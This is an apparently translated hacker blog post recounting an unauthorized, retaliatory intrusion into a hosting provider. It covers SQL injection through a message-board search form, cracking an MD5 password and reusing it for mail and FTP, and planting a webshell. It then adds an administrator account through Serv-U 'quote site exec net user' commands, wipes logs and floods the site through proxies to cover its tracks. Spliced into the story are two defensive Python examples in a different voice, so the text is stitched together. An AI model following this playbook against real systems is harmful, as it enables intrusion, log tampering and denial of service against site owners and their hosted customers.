Research on penetrating an IDC virtual host via search-parameter filtering

Source: Internet
Author: User
Tags: md5 encryption in domain mail account
One day, while chatting with a friend about blog ICP filing, the hosting provider (IDC) came up in passing. I had not expected it, but the friend had had a very unpleasant experience with one.
The story goes like this. Back then he was inexperienced and wanted to pick a virtual host for his site; out of habit he ran a security check on the server that hosted his own virtual host space, and ended up with permissions on the provider's web directory, so... he quietly added a year to his own hosting term. Unexpectedly the provider noticed, and shut down my friend's space and FTP account. Later he checked, and this hosting business did not even have an ICP license! Sweat...
But the provider is said to have hardened the server since, and the configuration is supposedly not bad. Since you not only operate illegally but also offended my friend, I might as well do a free security test for you!
Enough chatter. Since my friend says the security is decent, a system scan is not worth doing; let's go straight to web security. I looked and looked... dizzy! The main site's security really is solid, and the filtering is very strict. So I went to look again in Domain 3.0.
Whoa, so many virtual hosts packed onto the same server as their own site; they really make money! OK, here we go. I imported the URL for path scanning and turned up a few upfile.asp and upload.asp pages; I tried uploading through both and both failed (not surprising, these are very old holes). Since that did not work, I kept looking; I have patience.
I picked a site at random from the Domain 3.0 results, an online shopping site, and it has an ICP license! Sorry, sorry, you are not my target, I only want to borrow a webshell from you! With that explained, detection began...
First I looked for a bbs; none found, but there was a message board. Yes! It's you, let's have a look. At first glance the message board could not be simpler; I tried a few "and 1=1" and "and 1=2" and found no problem. Forcing out the database path was not an option either: this BT IDC has done error handling everywhere and returns a custom page, so even when an error occurs you get no useful information (though if the injection point is in an MSSQL database there is a way around this). Then my eye fell on "search messages". I opened it, and my gut told me there was a problem here.
There was a message near the top whose keyword was "popularity", so first I searched for "popular" in the search bar: the normal page came back.

Then, when I wanted to construct the test statement, there was a small problem: the query box limits the character length. That is a small matter! Save the current page source locally and search for the form action; you find the following:

Original code:
------------------------------------------------------------------------------------------
<form onsubmit="return check(this)" action=searchresult.asp method=post>
<table class=lybtable height=64 cellspacing=0 cellpadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width="100%" height=64>
<div align=center><font color=#000000> <B> Query way:</b> <select size=1
name=classid> <option selected> message content </OPTION> <OPTION> reply content </OPTION>
<OPTION> name </OPTION></SELECT> keywords: <input maxlength=12 size=28
name=keyword> <input class=noborder accesskey=s type=submit value="query (s)" name=b1>

</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
-----------------------------------------------------------------------------------------

We need to change a few things here: change "action=searchresult.asp" to "action=http://www.xxx.com/lyb/searchresult.asp" (I have hidden the real address here, to protect myself and to protect the site), and of course the most important change must not be forgotten: "maxlength=12" becomes "maxlength=152". The revised code is as follows:
------------------------------------------------------------------------------------------
<form onsubmit="return check(this)" action=http://www.xxx.com/lyb/searchresult.asp
method=post>
<table class=lybtable height=64 cellspacing=0 cellpadding=0 width=650
align=center>
<TBODY>
<TR>
<TD width="100%" height=64>
<div align=center><font color=#000000> <B> Query way:</b> <select size=1
name=classid> <option selected> message content </OPTION> <OPTION> reply content </OPTION>
<OPTION> name </OPTION></SELECT> keywords: <input maxlength=152 size=28
name=keyword> <input class=noborder accesskey=s type=submit value="query (s)" name=b1>
</FONT></DIV></TD></TR></TBODY></TABLE></FORM>
------------------------------------------------------------------------------------------
OK, now we can submit from the local copy! Open the modified page and query in the search box: "Popular% ' and 1=1 and '% ' = '" -- the normal page comes back.
Then query: "Popular% ' and 1=2 and '% ' = '" -- error! There is a problem.
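The maxlength trick above works because the 12-character limit lives only in the browser; the server accepts whatever arrives. The following is an added example, not code from the original post, that models both sides in Python with an in-memory SQLite table standing in for the message-board database (the table contents, MAX_KEYWORD_LEN and the function names are constructed assumptions). It shows a search that pastes the keyword straight into a LIKE clause, which is how the board evidently behaved, beside a hardened version that re-checks the length on the server and binds the keyword as a parameter with LIKE wildcards escaped. SQLite does not raise the error the real site showed for the 1=2 probe; the difference appears as an empty result set instead.

```python
import sqlite3

# Server-side twin of the form's maxlength=12 (assumed value for this example).
MAX_KEYWORD_LEN = 12

# Constructed sample rows standing in for the message board's table.
SAMPLE_MESSAGES = [
    ("alice", "popularity of the new shop is rising"),
    ("bob", "reply: shipping was quick"),
    ("carol", "2005 was a good year"),
]


def make_db():
    """Build the in-memory stand-in database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE message (name TEXT, content TEXT)")
    conn.executemany("INSERT INTO message VALUES (?, ?)", SAMPLE_MESSAGES)
    return conn


def search_vulnerable(conn, keyword):
    """Classic-ASP style: the keyword is concatenated into the LIKE clause.

    A keyword such as  popular%' and 1=1 and '%'='  closes the LIKE string,
    appends its own condition, and reopens a string so the query still parses.
    """
    sql = "SELECT name, content FROM message WHERE content LIKE '%" + keyword + "%'"
    return conn.execute(sql).fetchall()


def search_hardened(conn, keyword):
    """Enforce the length limit on the server and bind the keyword as a parameter."""
    if len(keyword) > MAX_KEYWORD_LEN:
        raise ValueError("keyword too long")
    # Escape LIKE metacharacters so user-supplied % and _ are matched literally.
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    pattern = "%" + escaped + "%"
    return conn.execute(
        "SELECT name, content FROM message WHERE content LIKE ? ESCAPE '\\'",
        (pattern,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "popular%' and 1=1 and '%'='"
    print("vulnerable, 1=1 probe:", search_vulnerable(db, probe))
    print("vulnerable, 1=2 probe:", search_vulnerable(db, probe.replace("1=1", "1=2")))
    print("hardened, plain keyword:", search_hardened(db, "popular"))
```

The hardened version rejects the probe before it reaches the database, and even a short keyword containing a stray quote or percent sign is matched as literal text rather than interpreted.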

OK, now that we have found a breakthrough, let's go! Guessing by hand is too tiring, so hand it to NBSI 2. Construct the following URL: http://www.xxx.com/lyb/searchresult.asp?classid= message content &keyword= popularity, and for the keyword enter a word that appears on the normal page; I chose "2005". OK, go! NBSI 2 ran fast, and before long the password came out. Halo, MD5-encrypted, but no matter; it was cracked in no time.
No need to scan for paths; the webmaster login link is right on the page, and we logged in successfully! But the situation is not optimistic: the backend functions could not be more minimal, and getting a webshell out of it is far from easy! Change of thinking: scan for the shopping system's backend (I had hoped to find an administrator login link directly, as with the message board, but could not). The scan result was disappointing; we do not know the backend path. Is there really no way forward? There is, you just cannot find it by looking! We noticed something here.
The administrator's information includes a mail account. Just to try, I logged in to the site administrator's mailbox with it: unexpectedly successful! What would you do now? Yes, the FTP account! Using the part of the mail address before the @ as the account name and the password cracked earlier, we connected successfully to the hosting provider's FTP. And then? Upload a webshell, of course!
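The search form submits via POST, so its keyword never reaches the web server's request log, but the GET URL handed to the injection tool above does land there, and a burst of probe requests from one address against one script is exactly what an administrator should be watching for. The following is an added example, not from the original post: a small detector run over constructed IIS-style W3C log lines (the addresses, timestamps and field layout are assumed, the injection patterns are the ones quoted in this post). It URL-decodes the query string, flags tautology-style conditions appended after a quote, and groups flagged requests by client and script so a scan stands out from a single stray quote in a search term.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in a reduced W3C layout (not real logs):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2006-03-01 10:00:01 10.0.0.5 GET /lyb/searchresult.asp classid=1&keyword=2005 200
2006-03-01 10:00:02 10.0.0.5 GET /lyb/searchresult.asp classid=1&keyword=2005%25%27+and+1%3D1+and+%27%25%27%3D%27 200
2006-03-01 10:00:02 10.0.0.5 GET /lyb/searchresult.asp classid=1&keyword=2005%25%27+and+1%3D2+and+%27%25%27%3D%27 500
2006-03-01 10:00:03 10.0.0.5 GET /lyb/searchresult.asp classid=1&keyword=2005%25%27+and+%27a%27%3D%27a 200
2006-03-01 10:05:00 10.0.0.9 GET /lyb/searchresult.asp classid=1&keyword=shipping 200
"""

# A closing quote followed by an appended boolean comparison: ' and 1=1, ' or 'a'='a ...
INJECTION_RE = re.compile(r"'\s*(?:and|or)\s+\S+\s*=\s*\S+", re.IGNORECASE)


def parse_line(line):
    """Split one reduced W3C line into a record, decoding the query string."""
    date, time, ip, method, stem, query, status = line.split()
    return {
        "ts": f"{date} {time}",
        "ip": ip,
        "method": method,
        "stem": stem,
        "query": unquote_plus(query),  # decode %27 -> ' and + -> space before matching
        "status": int(status),
    }


def flag_injection_attempts(log_text):
    """Return the records whose decoded query string matches the injection pattern."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if INJECTION_RE.search(rec["query"]):
            hits.append(rec)
    return hits


def burst_sources(hits, threshold=3):
    """(ip, script) pairs with at least `threshold` flagged requests: automated probing."""
    counts = defaultdict(int)
    for rec in hits:
        counts[(rec["ip"], rec["stem"])] += 1
    return sorted(key for key, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    flagged = flag_injection_attempts(SAMPLE_LOG)
    for rec in flagged:
        print(rec["ts"], rec["ip"], rec["status"], rec["query"])
    print("bursting sources:", burst_sources(flagged))
```

Decoding before matching matters: the raw log line contains only %27 and %3D, so a pattern written against the literal quote would never fire. The status column is kept in the record because a run of custom error pages (500s) interleaved with normal 200s on the same script from one client is the blind-injection rhythm described in the post.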
I grabbed an "ocean" ASP shell (2006 Network Ann China Zrrrshoo Personal Edition), uploaded it, opened the link, and it was not killed: success. A rough look at the directory settings showed the standard virtual-host rights allocation: each space runs independently, the folder name is the domain name, other sites' directories cannot be traversed, and the root directories of the C, D and E partitions cannot be browsed! "net user", as expected, could not be executed! I tried jumping to "c:\winnt\system32\inetsrv\data\": success! I uploaded a renamed cmd.exe and, in the shell, specified the path "c:\winnt\system32\inetsrv\data\cmd.exe /c" to run commands: success! "net start": again as expected, Serv-U is obediently lying there on the server, waiting to hand us elevated privileges. But don't get optimistic; before you succeed, nothing is certain! "netstat -an": a "43958" jumped out of the listing, so it seems less complicated than imagined! Then I jumped to "C:\Documents and Settings\All Users\Start Menu\Programs\", found the Serv-U folder, went in and downloaded the shortcut, and from it learned the Serv-U installation path: "D:\serv-U\". Can we jump into it? Success! Then the old routine: write a new user into "Servudaemon.ini" and get ready to leave, but unexpectedly an error came back! Depressing; it seems there is no write permission...
But something surprising happened. I had assumed a firewall filtered all but a few ports, but after uploading fpipe the forwarded high port could be connected to directly, so what more is there to say: create a new FTP domain locally, manage it over the remote connection, add users, and over FTP run "quote site exec net user zrrrshoo /add"; "quote site exec net user zrrrshoo zrrr"; "quote site exec net localgroup administrators Zrrrshoo /add". He has 3389; I was afraid login restrictions were in place, but in fact my worries were unnecessary! Just log in. OK, safety first: clear all logs, then open ChallengeCollapsar with 30 proxies to hit varying paths for 15 minutes (mainly to keep the web log empty), OK! I'll hand it over to my friend tomorrow.
